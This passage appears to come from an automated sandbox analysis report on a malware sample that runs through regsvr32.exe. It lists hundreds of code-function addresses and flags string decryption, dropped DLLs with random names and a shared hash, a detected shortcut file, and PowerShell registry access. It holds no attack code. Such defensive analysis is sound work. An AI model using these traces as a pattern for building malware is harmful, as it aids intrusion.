Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA51CA6850 3_2_00007FFA51CA6850
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA51CA443C 3_2_00007FFA51CA443C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA51CA53FB 3_2_00007FFA51CA53FB
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00AC0000 3_2_00AC0000
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180006414 3_2_0000000180006414
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180005C74 3_2_0000000180005C74
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002ACE8 3_2_000000018002ACE8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180024104 3_2_0000000180024104
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000359C 3_2_000000018000359C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000E99C 3_2_000000018000E99C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180019628 3_2_0000000180019628
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180025A9D 3_2_0000000180025A9D
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002B7B2 3_2_000000018002B7B2
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180009408 3_2_0000000180009408
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180023C14 3_2_0000000180023C14
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002582C 3_2_000000018002582C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000B834 3_2_000000018000B834
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000403C 3_2_000000018000403C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180021444 3_2_0000000180021444
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180012044 3_2_0000000180012044
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180016054 3_2_0000000180016054
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001705C 3_2_000000018001705C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180001870 3_2_0000000180001870
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001F878 3_2_000000018001F878
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180014484 3_2_0000000180014484
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180015494 3_2_0000000180015494
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000BC98 3_2_000000018000BC98
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180008C9C 3_2_0000000180008C9C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800078A4 3_2_00000001800078A4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001F0A8 3_2_000000018001F0A8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001E4AC 3_2_000000018001E4AC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800048B0 3_2_00000001800048B0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001ACB4 3_2_000000018001ACB4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800090B4 3_2_00000001800090B4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800270C0 3_2_00000001800270C0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800024C0 3_2_00000001800024C0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800280C8 3_2_00000001800280C8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800050D4 3_2_00000001800050D4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800234D8 3_2_00000001800234D8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800150F0 3_2_00000001800150F0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180012500 3_2_0000000180012500
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001A10C 3_2_000000018001A10C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180028D10 3_2_0000000180028D10
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180020118 3_2_0000000180020118
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001A524 3_2_000000018001A524
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180002D28 3_2_0000000180002D28
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000E130 3_2_000000018000E130
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180029134 3_2_0000000180029134
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180008134 3_2_0000000180008134
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180022140 3_2_0000000180022140
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180006954 3_2_0000000180006954
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000F554 3_2_000000018000F554
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002B564 3_2_000000018002B564
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180012168 3_2_0000000180012168
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180013568 3_2_0000000180013568
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180024570 3_2_0000000180024570
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180019178 3_2_0000000180019178
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180025180 3_2_0000000180025180
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180001980 3_2_0000000180001980
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180021588 3_2_0000000180021588
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001A988 3_2_000000018001A988
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180018190 3_2_0000000180018190
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180013994 3_2_0000000180013994
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180028998 3_2_0000000180028998
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800061A0 3_2_00000001800061A0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800135A6 3_2_00000001800135A6
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180016DA8 3_2_0000000180016DA8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800059AC 3_2_00000001800059AC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800135B4 3_2_00000001800135B4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001C1B8 3_2_000000018001C1B8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800025B8 3_2_00000001800025B8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800085BC 3_2_00000001800085BC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800015C0 3_2_00000001800015C0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800295C8 3_2_00000001800295C8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800229CC 3_2_00000001800229CC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000E5D4 3_2_000000018000E5D4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002A5D8 3_2_000000018002A5D8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800261E0 3_2_00000001800261E0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800079EC 3_2_00000001800079EC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180023624 3_2_0000000180023624
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180018628 3_2_0000000180018628
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180017E2C 3_2_0000000180017E2C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180017638 3_2_0000000180017638
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180004E3C 3_2_0000000180004E3C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180020E40 3_2_0000000180020E40
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180015A64 3_2_0000000180015A64
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180015264 3_2_0000000180015264
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000A26C 3_2_000000018000A26C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180007678 3_2_0000000180007678
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001667C 3_2_000000018001667C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180012680 3_2_0000000180012680
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180001E88 3_2_0000000180001E88
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000968C 3_2_000000018000968C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180022290 3_2_0000000180022290
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180026A90 3_2_0000000180026A90
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000529C 3_2_000000018000529C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180020AA0 3_2_0000000180020AA0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180022AAC 3_2_0000000180022AAC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180007EB4 3_2_0000000180007EB4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800162BC 3_2_00000001800162BC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800252C0 3_2_00000001800252C0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001AEC8 3_2_000000018001AEC8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001F6DC 3_2_000000018001F6DC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800026DC 3_2_00000001800026DC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180002ADC 3_2_0000000180002ADC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001E2F4 3_2_000000018001E2F4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180016AF4 3_2_0000000180016AF4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000DEF4 3_2_000000018000DEF4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001DEFC 3_2_000000018001DEFC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180006308 3_2_0000000180006308
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001370C 3_2_000000018001370C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180004B18 3_2_0000000180004B18
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180015F24 3_2_0000000180015F24
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180006B24 3_2_0000000180006B24
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000F328 3_2_000000018000F328
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180021738 3_2_0000000180021738
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002AF38 3_2_000000018002AF38
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180028348 3_2_0000000180028348
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000DB4C 3_2_000000018000DB4C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180014F50 3_2_0000000180014F50
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000B350 3_2_000000018000B350
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000A758 3_2_000000018000A758
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002975C 3_2_000000018002975C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180024370 3_2_0000000180024370
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180008370 3_2_0000000180008370
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180015774 3_2_0000000180015774
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180012378 3_2_0000000180012378
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180026B98 3_2_0000000180026B98
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001CF9C 3_2_000000018001CF9C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001EBA0 3_2_000000018001EBA0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001B3A4 3_2_000000018001B3A4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000D7AC 3_2_000000018000D7AC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800053B0 3_2_00000001800053B0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180015BB8 3_2_0000000180015BB8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800207BC 3_2_00000001800207BC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000FFC0 3_2_000000018000FFC0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800173DC 3_2_00000001800173DC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180018BDC 3_2_0000000180018BDC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_022F0000 4_2_022F0000
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180006414 4_2_0000000180006414
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000C819 4_2_000000018000C819
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180019628 4_2_0000000180019628
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180025A4C 4_2_0000000180025A4C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180012864 4_2_0000000180012864
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180005C74 4_2_0000000180005C74
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800248B0 4_2_00000001800248B0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800252C0 4_2_00000001800252C0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180024104 4_2_0000000180024104
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180006B24 4_2_0000000180006B24
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180006F2C 4_2_0000000180006F2C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000A758 4_2_000000018000A758
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180024570 4_2_0000000180024570
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000E99C 4_2_000000018000E99C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018001B3A4 4_2_000000018001B3A4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800079EC 4_2_00000001800079EC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180009408 4_2_0000000180009408
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180023C14 4_2_0000000180023C14
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180023624 4_2_0000000180023624
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180018628 4_2_0000000180018628
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018002582C 4_2_000000018002582C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180017E2C 4_2_0000000180017E2C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000B834 4_2_000000018000B834
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180017638 4_2_0000000180017638
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000403C 4_2_000000018000403C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180004E3C 4_2_0000000180004E3C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180020E40 4_2_0000000180020E40
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180021444 4_2_0000000180021444
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180012044 4_2_0000000180012044
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180016054 4_2_0000000180016054
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018001705C 4_2_000000018001705C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180015A64 4_2_0000000180015A64
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180015264 4_2_0000000180015264
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000A26C 4_2_000000018000A26C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180001870 4_2_0000000180001870
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018001F878 4_2_000000018001F878
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180007678 4_2_0000000180007678
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018001667C 4_2_000000018001667C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180012680 4_2_0000000180012680
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180014484 4_2_0000000180014484
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180001E88 4_2_0000000180001E88
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000968C 4_2_000000018000968C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180022290 4_2_0000000180022290
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180026A90 4_2_0000000180026A90
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180015494 4_2_0000000180015494
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000BC98 4_2_000000018000BC98
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000529C 4_2_000000018000529C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180008C9C 4_2_0000000180008C9C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180020AA0 4_2_0000000180020AA0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800078A4 4_2_00000001800078A4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018001F0A8 4_2_000000018001F0A8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180022AAC 4_2_0000000180022AAC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018001E4AC 4_2_000000018001E4AC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800048B0 4_2_00000001800048B0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018001ACB4 4_2_000000018001ACB4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180007EB4 4_2_0000000180007EB4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800090B4 4_2_00000001800090B4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800162BC 4_2_00000001800162BC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800270C0 4_2_00000001800270C0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800024C0 4_2_00000001800024C0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800280C8 4_2_00000001800280C8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018001AEC8 4_2_000000018001AEC8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800050D4 4_2_00000001800050D4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800234D8 4_2_00000001800234D8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018001F6DC 4_2_000000018001F6DC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800026DC 4_2_00000001800026DC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180002ADC 4_2_0000000180002ADC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018002ACE8 4_2_000000018002ACE8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800150F0 4_2_00000001800150F0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018001E2F4 4_2_000000018001E2F4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180016AF4 4_2_0000000180016AF4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000DEF4 4_2_000000018000DEF4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018001DEFC 4_2_000000018001DEFC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180012500 4_2_0000000180012500
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180006308 4_2_0000000180006308
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018001370C 4_2_000000018001370C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018001A10C 4_2_000000018001A10C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180028D10 4_2_0000000180028D10
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180020118 4_2_0000000180020118
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180004B18 4_2_0000000180004B18
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018001A524 4_2_000000018001A524
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180015F24 4_2_0000000180015F24
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000F328 4_2_000000018000F328
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180002D28 4_2_0000000180002D28
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000E130 4_2_000000018000E130
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180029134 4_2_0000000180029134
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180008134 4_2_0000000180008134
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180021738 4_2_0000000180021738
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018002AF38 4_2_000000018002AF38
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180022140 4_2_0000000180022140
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180028348 4_2_0000000180028348
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000DB4C 4_2_000000018000DB4C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180014F50 4_2_0000000180014F50
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000B350 4_2_000000018000B350
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180006954 4_2_0000000180006954
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000F554 4_2_000000018000F554
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018002975C 4_2_000000018002975C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018002B564 4_2_000000018002B564
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180012168 4_2_0000000180012168
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180013568 4_2_0000000180013568
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180024370 4_2_0000000180024370
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180008370 4_2_0000000180008370
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180015774 4_2_0000000180015774
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180012378 4_2_0000000180012378
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180019178 4_2_0000000180019178
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180025180 4_2_0000000180025180
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180001980 4_2_0000000180001980
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180021588 4_2_0000000180021588
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018001A988 4_2_000000018001A988
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180018190 4_2_0000000180018190
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180013994 4_2_0000000180013994
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180026B98 4_2_0000000180026B98
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180028998 4_2_0000000180028998
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018001CF9C 4_2_000000018001CF9C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000359C 4_2_000000018000359C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018001EBA0 4_2_000000018001EBA0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800061A0 4_2_00000001800061A0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800135A6 4_2_00000001800135A6
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180016DA8 4_2_0000000180016DA8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800059AC 4_2_00000001800059AC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000D7AC 4_2_000000018000D7AC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800053B0 4_2_00000001800053B0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800135B4 4_2_00000001800135B4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018001C1B8 4_2_000000018001C1B8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180015BB8 4_2_0000000180015BB8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800025B8 4_2_00000001800025B8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800207BC 4_2_00000001800207BC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800085BC 4_2_00000001800085BC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800015C0 4_2_00000001800015C0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000FFC0 4_2_000000018000FFC0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800295C8 4_2_00000001800295C8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800229CC 4_2_00000001800229CC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000E5D4 4_2_000000018000E5D4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018002A5D8 4_2_000000018002A5D8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800173DC 4_2_00000001800173DC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180018BDC 4_2_0000000180018BDC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800261E0 4_2_00000001800261E0
Found potential string decryption / allocating functions
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 00007FFA51CA7FF0 appears 31 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 00007FFA51CAB3B0 appears 148 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 00007FFA51CABD70 appears 113 times
Tries to load missing DLLs
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP 4F7092CD881FC00ED017787C704C3D1B221B5B13D9A34539732BFC1EDB8261C5
Source: Joe Sandbox View Dropped File: C:\Windows\System32\PZgVlkJBEGfsjmei\fJMgQrGs.dll (copy) 4F7092CD881FC00ED017787C704C3D1B221B5B13D9A34539732BFC1EDB8261C5
Source: Details.lnk ReversingLabs: Detection: 41%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
